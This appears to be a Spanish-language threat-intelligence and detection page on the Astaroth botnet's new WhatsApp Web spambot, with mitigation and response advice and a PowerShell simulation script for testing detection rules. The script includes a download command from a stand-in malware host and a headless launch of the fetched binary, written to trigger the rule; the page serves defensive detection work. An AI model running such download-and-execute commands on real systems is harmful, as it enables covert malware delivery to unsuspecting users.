Astaroth agrega un nuevo componente de spambot para campañas de correo electrónico
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los operadores de la botnet Astaroth han añadido un nuevo componente spambot de WhatsApp Web para ampliar su alcance en el ecosistema de cibercrimen de América Latina. El módulo utiliza automatización de navegador sin cabeza para convertir a las víctimas comprometidas en nodos de distribución enviando mensajes maliciosos a sus contactos de WhatsApp. Este desarrollo marca un cambio del spam tradicional por correo electrónico hacia plataformas de mensajería social.
Investigación
La investigación incluyó un análisis técnico detallado del spambot Astaroth, descubriendo cifrado AES-CTS, un complejo proceso de ofuscación de cadenas de seis etapas y estructuras de configuración personalizadas. Los investigadores identificaron similitudes de código sustanciales entre los spambots Astaroth y Vareg, lo que sugiere desarrolladores compartidos o arreglos de intercambio de código. El análisis también confirmó el abuso de marcos legítimos de automatización de navegadores, incluidos WebDriver y WPPConnect/WA-JS, para ejecutar campañas de spam ocultas.
Mitigación
Las organizaciones deben educar a los usuarios sobre la ingeniería social basada en WhatsApp y desanimar la apertura o ejecución de archivos recibidos de contactos desconocidos. Las protecciones de descarga del navegador deben estar habilitadas, mientras que las descargas y ejecuciones no autorizadas de WebDriver deben ser monitoreadas de cerca. Los equipos de seguridad también deben vigilar la creación sospechosa de directorios dentro de la carpeta Temp de Windows y considerar bloquear WPPConnect/WA-JS cuando no sea necesario para el uso empresarial legítimo.
Respuesta
Si se detecta actividad de Astaroth, los endpoints afectados deben ser aislados inmediatamente para detener la propagación de spam y la entrega de malware. Los investigadores deben buscar procesos de navegador sin cabeza e inusuales ChromeAuto_ directorios dentro de C:UsersPublicTemp. Los procesos WebDriver identificados deben someterse a un análisis forense, y la actividad de la red debe ser revisada para conexiones no autorizadas a infraestructuras conocidas de C2 de Astaroth.
Flujo de Ataque
Detecciones
Comando y Control sospechoso por solicitud DNS de Dominio de Nivel Superior (TLD) inusual (via dns)
Ver
IOCs (HashSha256) para detectar: dentro del nuevo componente spambot de Astaroth
Ver
Detección de Actividad de WebDriver del Spambot Astaroth [Creación de Proceso de Windows]
Ver
Ejecución de Simulación
Prerrequisito: El Chequeo de Prevuelo de Telemetría y Línea Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTP identificadas y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico incorrecto.
-
Narrativa de Ataque y Comandos: El adversario pretende desplegar un módulo de spam automatizado de WhatsApp. Para hacerlo, primero utilizan una técnica de uso de recursos presentes en el sistema, utilizando PowerShell para descargar un
WebDriverbinario a un directorio local. Una vez que la herramienta está presente, el adversario ejecuta el binario usando las--headlessand--disable-infobarsbanderas. Esto permite que la automatización se ejecute en segundo plano, invisible para el usuario, facilitando la campaña de spam mientras se minimiza la huella en el host. -
Script de Prueba de Regresión:
# Script de Simulación del Spambot Astaroth # Este script simula la secuencia de descarga y ejecución definida en la regla de detección. $workDir = "$env:TEMPWebDriverSimulation" if (!(Test-Path $workDir)) { New-Item -Path $workDir -ItemType Directory } Set-Location $workDir # 1. Simular Descarga (Activa selection_webdriver_download) Write-Host "[+] Simulando descarga de WebDriver vía PowerShell..." $dummyWebDriver = "WebDriver.exe" New-Item -Path $dummyWebDriver -ItemType File # Imitando la línea de comandos que busca la regla powershell.exe -Command "Invoke-WebRequest -Uri 'http://fake-malware-site.com/WebDriver' -OutFile 'WebDriver.exe'" # 2. Simular Ejecución (Activa selection_webdriver_execution y selection_session_creation) Write-Host "[+] Simulando ejecución de WebDriver con banderas sin cabeza..." # Usamos Start-Process para asegurar que la línea de comandos se captura como un evento de creación de proceso Start-Process -FilePath ".$dummyWebDriver" -ArgumentList "--headless", "--disable-infobars" -NoNewWindow -
Comandos de Limpieza:
# Limpiar artefactos de simulación Remove-Item -Path "$env:TEMPWebDriverSimulation" -Recurse -Force Write-Host "[+] Limpieza completa."